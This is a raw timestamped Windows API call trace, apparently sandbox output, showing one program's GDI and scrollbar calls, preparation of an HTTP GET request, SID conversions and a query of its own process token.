[0160.023] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee7c | out: lptm=0x24ee7c) returned 1
[0160.023] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.023] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.023] GetSystemMetrics (nIndex=6) returned 1
[0160.023] GetDC (hWnd=0x0) returned 0x4f010863
[0160.023] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee58 | out: lptm=0x24ee58) returned 1
[0160.023] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
[0160.023] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee90 | out: lptm=0x24ee90) returned 1
[0160.023] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.023] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.023] GetSystemMetrics (nIndex=6) returned 1
[0160.023] GetDC (hWnd=0x0) returned 0x4f010863
[0160.023] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24eb5c | out: lptm=0x24eb5c) returned 1
[0160.023] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
[0160.023] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24eb94 | out: lptm=0x24eb94) returned 1
[0160.023] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.023] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.024] GetSystemMetrics (nIndex=6) returned 1
[0160.024] GetDC (hWnd=0x0) returned 0x4f010863
[0160.024] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee58 | out: lptm=0x24ee58) returned 1
[0160.024] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
[0160.024] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee90 | out: lptm=0x24ee90) returned 1
[0160.024] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.024] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.024] GetSystemMetrics (nIndex=6) returned 1
[0160.024] GetDC (hWnd=0x0) returned 0x4f010863
[0160.024] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24eb5c | out: lptm=0x24eb5c) returned 1
[0160.024] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
[0160.024] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24eb94 | out: lptm=0x24eb94) returned 1
[0160.024] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.024] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.024] GetSystemMetrics (nIndex=6) returned 1
[0160.025] GetDC (hWnd=0x0) returned 0x4f010863
[0160.025] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee58 | out: lptm=0x24ee58) returned 1
[0160.025] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
[0160.025] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee90 | out: lptm=0x24ee90) returned 1
[0160.025] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.025] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.025] GetSystemMetrics (nIndex=6) returned 1
[0160.025] GetDC (hWnd=0x0) returned 0x4f010863
[0160.025] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24eb5c | out: lptm=0x24eb5c) returned 1
[0160.025] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
[0160.025] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24eb94 | out: lptm=0x24eb94) returned 1
[0160.025] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.025] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.025] GetSystemMetrics (nIndex=6) returned 1
[0160.025] GetDC (hWnd=0x0) returned 0x4f010863
[0160.025] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee58 | out: lptm=0x24ee58) returned 1
[0160.025] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
[0160.025] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee90 | out: lptm=0x24ee90) returned 1
[0160.025] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.025] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.025] GetSystemMetrics (nIndex=6) returned 1
[0160.025] GetDC (hWnd=0x0) returned 0x4f010863
[0160.025] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24eb5c | out: lptm=0x24eb5c) returned 1
[0160.026] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
[0160.026] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24eb94 | out: lptm=0x24eb94) returned 1
[0160.026] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.026] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.026] GetSystemMetrics (nIndex=6) returned 1
[0160.026] GetDC (hWnd=0x0) returned 0x4f010863
[0160.026] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee44 | out: lptm=0x24ee44) returned 1
[0160.026] SelectObject (hdc=0x4f010863, h=0x310a0871) returned 0x18a002e
[0160.026] GetTextMetricsA (in: hdc=0x4f010863, lptm=0x24ee7c | out: lptm=0x24ee7c) returned 1
[0160.026] SelectObject (hdc=0x4f010863, h=0x18a002e) returned 0x310a0871
[0160.026] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0160.026] GetSystemMetrics (nIndex=6) returned 1
[0160.028] SysReAllocStringLen (in: pbstr=0x2a0f388*=0x0, psz="GET", len=0x3 | out: pbstr=0x2a0f388*="GET") returned 1
[0160.028] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0160.028] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0160.028] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0160.028] SysReAllocStringLen (in: pbstr=0x2a0f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a0f388*="GET") returned 1
[0160.028] SysReAllocStringLen (in: pbstr=0x2a0f3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x2a0f3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0160.028] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0x24eee0, lpdwBufferLength=0x24eee4 | out: lpBuffer=0x24eee0, lpdwBufferLength=0x24eee4) returned 1
[0160.103] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0x24eee0, dwBufferLength=0x4) returned 1
[0160.103] VirtualFree (lpAddress=0x2a10000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0160.104] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2a06490, cbMultiByte=3, lpWideCharStr=0x24de18, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0160.104] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0160.104] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0160.104] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0160.104] SysReAllocStringLen (in: pbstr=0x2a0f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a0f388*="GET") returned 1
[0160.104] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0160.104] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0160.104] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0160.104] SysReAllocStringLen (in: pbstr=0x2a0f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2a0f388*="GET") returned 1
[0160.144] FlatSB_SetScrollProp (param_1=0x80140, index=0x200, newValue=0x0, param_4=1) returned 0
[0160.144] GetSysColor (nIndex=20) returned 0xffffff
[0160.144] FlatSB_SetScrollProp (param_1=0x80140, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0160.144] FlatSB_SetScrollInfo (param_1=0x80140, code=0, psi=0x24dd4e, fRedraw=1)
[0160.144] CallWindowProcA (lpPrevWndFunc=0x28e7038, hWnd=0x80140, Msg=0x46, wParam=0x0, lParam=0x24dc4c) returned 0x0
[0160.148] GetTextExtentPoint32A (in: hdc=0x4f010863, lpString="0", c=1, psizl=0x24efd4 | out: psizl=0x24efd4) returned 1
[0160.149] IsIconic (hWnd=0x80140) returned 0
[0160.149] GetClientRect (in: hWnd=0x80140, lpRect=0x24efd4 | out: lpRect=0x24efd4) returned 1
[0160.149] GetWindowLongA (hWnd=0x80140, nIndex=-16) returned 116326400
[0160.149] GetWindowLongA (hWnd=0x80140, nIndex=-16) returned 116326400
[0160.149] IsIconic (hWnd=0x80140) returned 0
[0160.149] GetClientRect (in: hWnd=0x80140, lpRect=0x24ef1c | out: lpRect=0x24ef1c) returned 1
[0160.149] GetWindowLongA (hWnd=0x80140, nIndex=-16) returned 116326400
[0160.149] GetWindowLongA (hWnd=0x80140, nIndex=-16) returned 116326400
[0160.149] IsIconic (hWnd=0x80140) returned 0
[0160.149] GetClientRect (in: hWnd=0x80140, lpRect=0x24eeec | out: lpRect=0x24eeec) returned 1
[0160.149] GetWindowLongA (hWnd=0x80140, nIndex=-16) returned 116326400
[0160.149] GetWindowLongA (hWnd=0x80140, nIndex=-16) returned 116326400
[0160.149] IsIconic (hWnd=0x80140) returned 0
[0160.149] GetClientRect (in: hWnd=0x80140, lpRect=0x24eeec | out: lpRect=0x24eeec) returned 1
[0160.149] FlatSB_SetScrollProp (param_1=0x80140, index=0x200, newValue=0x0, param_4=0) returned 0
[0160.149] GetSysColor (nIndex=20) returned 0xffffff
[0160.149] FlatSB_SetScrollProp (param_1=0x80140, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0160.149] FlatSB_SetScrollInfo (param_1=0x80140, code=0, psi=0x24ef2a, fRedraw=1) returned 0
[0160.149] GetWindowLongA (hWnd=0x80140, nIndex=-16) returned 116326400
[0160.149] IsIconic (hWnd=0x80140) returned 0
[0160.149] GetClientRect (in: hWnd=0x80140, lpRect=0x24eeec | out: lpRect=0x24eeec) returned 1
[0160.149] GetWindowLongA (hWnd=0x80140, nIndex=-16) returned 116326400
[0160.149] IsIconic (hWnd=0x80140) returned 0
[0160.149] GetClientRect (in: hWnd=0x80140, lpRect=0x24eeec | out: lpRect=0x24eeec) returned 1
[0160.149] GetWindowLongA (hWnd=0x80140, nIndex=-16) returned 116326400
[0160.149] IsIconic (hWnd=0x80140) returned 0
[0160.149] GetClientRect (in: hWnd=0x80140, lpRect=0x24eeec | out: lpRect=0x24eeec) returned 1
[0160.149] FlatSB_SetScrollProp (param_1=0x80140, index=0x100, newValue=0x0, param_4=0) returned 0
[0160.150] GetSysColor (nIndex=20) returned 0xffffff
[0160.150] FlatSB_SetScrollProp (param_1=0x80140, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0160.150] FlatSB_SetScrollInfo (param_1=0x80140, code=1, psi=0x24ef2a, fRedraw=1) returned 0
[0160.150] GetWindowLongA (hWnd=0x80140, nIndex=-16) returned 116326400
[0160.150] IsIconic (hWnd=0x80140) returned 0
[0160.150] GetClientRect (in: hWnd=0x80140, lpRect=0x24eeec | out: lpRect=0x24eeec) returned 1
[0160.150] GetWindowLongA (hWnd=0x80140, nIndex=-16) returned 116326400
[0160.150] GetWindowLongA (hWnd=0x80140, nIndex=-16) returned 116326400
[0160.150] IsIconic (hWnd=0x80140) returned 0
[0160.150] GetClientRect (in: hWnd=0x80140, lpRect=0x24ef1c | out: lpRect=0x24ef1c) returned 1
[0160.150] GetWindowLongA (hWnd=0x80140, nIndex=-16) returned 116326400
[0160.150] GetWindowLongA (hWnd=0x80140, nIndex=-16) returned 116326400
[0160.150] IsIconic (hWnd=0x80140) returned 0
[0160.150] GetClientRect (in: hWnd=0x80140, lpRect=0x24eeec | out: lpRect=0x24eeec) returned 1
[0160.150] GetWindowLongA (hWnd=0x80140, nIndex=-16) returned 116326400
[0160.150] GetWindowLongA (hWnd=0x80140, nIndex=-16) returned 116326400
[0160.150] IsIconic (hWnd=0x80140) returned 0
[0160.150] GetClientRect (in: hWnd=0x80140, lpRect=0x24eeec | out: lpRect=0x24eeec) returned 1
[0160.150] FlatSB_SetScrollProp (param_1=0x80140, index=0x200, newValue=0x0, param_4=0) returned 0
[0160.150] GetSysColor (nIndex=20) returned 0xffffff
[0160.150] FlatSB_SetScrollProp (param_1=0x80140, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0160.150] FlatSB_SetScrollInfo (param_1=0x80140, code=0, psi=0x24ef2a, fRedraw=1) returned 0
[0160.150] GetWindowLongA (hWnd=0x80140, nIndex=-16) returned 116326400
[0160.150] IsIconic (hWnd=0x80140) returned 0
[0160.150] GetClientRect (in: hWnd=0x80140, lpRect=0x24eeec | out: lpRect=0x24eeec) returned 1
[0160.150] GetWindowLongA (hWnd=0x80140, nIndex=-16) returned 116326400
[0160.151] IsIconic (hWnd=0x80140) returned 0
[0160.151] GetClientRect (in: hWnd=0x80140, lpRect=0x24eeec | out: lpRect=0x24eeec) returned 1
[0160.151] GetWindowLongA (hWnd=0x80140, nIndex=-16) returned 116326400
[0160.151] IsIconic (hWnd=0x80140) returned 0
[0160.151] GetClientRect (in: hWnd=0x80140, lpRect=0x24eeec | out: lpRect=0x24eeec) returned 1
[0160.151] FlatSB_SetScrollProp (param_1=0x80140, index=0x100, newValue=0x0, param_4=0) returned 0
[0160.151] GetSysColor (nIndex=20) returned 0xffffff
[0160.151] FlatSB_SetScrollProp (param_1=0x80140, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0160.151] FlatSB_SetScrollInfo (param_1=0x80140, code=1, psi=0x24ef2a, fRedraw=1) returned 0
[0160.151] GetWindowLongA (hWnd=0x80140, nIndex=-16) returned 116326400
[0160.151] IsIconic (hWnd=0x80140) returned 0
[0160.151] GetClientRect (in: hWnd=0x80140, lpRect=0x24eeec | out: lpRect=0x24eeec) returned 1
[0160.151] GetCurrentThreadId () returned 0x6e4
[0160.151] ConvertSidToStringSidA () returned 0x1
[0160.151] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.151] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0160.151] LocalFree (hMem=0x666f40) returned 0x0
[0160.152] LocalFree (hMem=0x652f90) returned 0x0
[0160.152] ConvertStringSidToSidA () returned 0x1
[0160.152] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a02914, pSourceSid=0x652f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a02914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0160.152] IsValidSid (pSid=0x2a02914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0160.152] ConvertSidToStringSidA () returned 0x1
[0160.152] LocalFree (hMem=0x666f40) returned 0x0
[0160.152] LocalFree (hMem=0x652f90) returned 0x0
[0160.152] ConvertStringSidToSidA () returned 0x1
[0160.152] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a0702c, pSourceSid=0x652f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a0702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0160.152] IsValidSid (pSid=0x2a0702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0160.152] ConvertSidToStringSidA () returned 0x1
[0160.152] LocalFree (hMem=0x666f40) returned 0x0
[0160.152] LocalFree (hMem=0x652f90) returned 0x0
[0160.152] ConvertStringSidToSidA () returned 0x1
[0160.152] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a0f5a0, pSourceSid=0x652f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a0f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0160.152] IsValidSid (pSid=0x2a0f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0160.152] ConvertSidToStringSidA () returned 0x1
[0160.152] LocalFree (hMem=0x666f40) returned 0x0
[0160.152] LocalFree (hMem=0x652f90) returned 0x0
[0160.152] ConvertStringSidToSidA () returned 0x1
[0160.152] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a0f614, pSourceSid=0x666f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2a0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.152] IsValidSid (pSid=0x2a0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.152] ConvertSidToStringSidA () returned 0x1
[0160.152] LocalFree (hMem=0x666f58) returned 0x0
[0160.152] LocalFree (hMem=0x666f40) returned 0x0
[0160.152] ConvertStringSidToSidA () returned 0x1
[0160.152] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a0f688, pSourceSid=0x666f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x2a0f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0160.152] IsValidSid (pSid=0x2a0f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0160.152] ConvertSidToStringSidA () returned 0x1
[0160.152] LocalFree (hMem=0x666f58) returned 0x0
[0160.152] LocalFree (hMem=0x666f40) returned 0x0
[0160.152] ConvertStringSidToSidA () returned 0x1
[0160.152] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a0f6fc, pSourceSid=0x666f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x2a0f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0160.153] IsValidSid (pSid=0x2a0f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0160.153] ConvertSidToStringSidA () returned 0x1
[0160.153] LocalFree (hMem=0x65c1c8) returned 0x0
[0160.153] LocalFree (hMem=0x666f58) returned 0x0
[0160.153] ConvertStringSidToSidA () returned 0x1
[0160.153] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a0f770, pSourceSid=0x666f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x2a0f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0160.153] IsValidSid (pSid=0x2a0f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0160.153] ConvertSidToStringSidA () returned 0x1
[0160.153] LocalFree (hMem=0x65c1c8) returned 0x0
[0160.153] LocalFree (hMem=0x666f70) returned 0x0
[0160.153] ConvertStringSidToSidA () returned 0x1
[0160.153] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a0f7f8, pSourceSid=0x666f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x2a0f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0160.153] IsValidSid (pSid=0x2a0f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0160.153] ConvertSidToStringSidA () returned 0x1
[0160.153] LocalFree (hMem=0x65c1c8) returned 0x0
[0160.153] LocalFree (hMem=0x666f40) returned 0x0
[0160.153] ConvertStringSidToSidA () returned 0x1
[0160.153] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a0f880, pSourceSid=0x666f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x2a0f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0160.153] IsValidSid (pSid=0x2a0f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0160.153] ConvertSidToStringSidA () returned 0x1
[0160.153] LocalFree (hMem=0x666f58) returned 0x0
[0160.153] LocalFree (hMem=0x666f40) returned 0x0
[0160.153] ConvertStringSidToSidA () returned 0x1
[0160.153] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a0f90c, pSourceSid=0x666f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x2a0f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0160.153] IsValidSid (pSid=0x2a0f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0160.153] ConvertSidToStringSidA () returned 0x1
[0160.153] LocalFree (hMem=0x666f58) returned 0x0
[0160.153] LocalFree (hMem=0x666f40) returned 0x0
[0160.153] ConvertStringSidToSidA () returned 0x1
[0160.153] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a0f998, pSourceSid=0x666f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x2a0f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0160.153] IsValidSid (pSid=0x2a0f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0160.153] ConvertSidToStringSidA () returned 0x1
[0160.153] LocalFree (hMem=0x666f58) returned 0x0
[0160.153] LocalFree (hMem=0x666f40) returned 0x0
[0160.154] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.154] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0160.154] GetCurrentThread () returned 0xfffffffe
[0160.154] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.154] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0160.154] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0x24e7ac | out: TokenHandle=0x24e7ac*=0x28e3756) returned 0
[0160.154] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.154] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0160.154] GetCurrentProcess () returned 0xffffffff
[0160.154] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.154] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0160.154] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x2a0fa3c | out: TokenHandle=0x2a0fa3c*=0x1d0) returned 1
[0160.155] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.155] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0160.155] MapGenericMask (in: AccessMask=0x24e624, GenericMapping=0x24e628 | out: AccessMask=0x24e624)
[0160.155] MapGenericMask (in: AccessMask=0x24e758, GenericMapping=0x24e75c | out: AccessMask=0x24e758)
[0160.155] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.155] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0160.155] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24e76c | out: TokenInformation=0x0, ReturnLength=0x24e76c) returned 0
[0160.155] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.155] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0160.155] GetLastError () returned 0x7a
[0160.155] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.155] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0160.156] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x660780, TokenInformationLength=0x24, ReturnLength=0x24e790 | out: TokenInformation=0x660780, ReturnLength=0x24e790) returned 1
[0160.156] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a0fab0, pSourceSid=0x660788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2a0fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
